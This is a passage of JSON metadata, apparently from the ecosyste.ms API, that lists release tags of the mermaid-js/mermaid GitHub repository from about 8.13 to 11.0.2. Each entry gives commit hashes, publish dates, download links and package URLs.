tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10d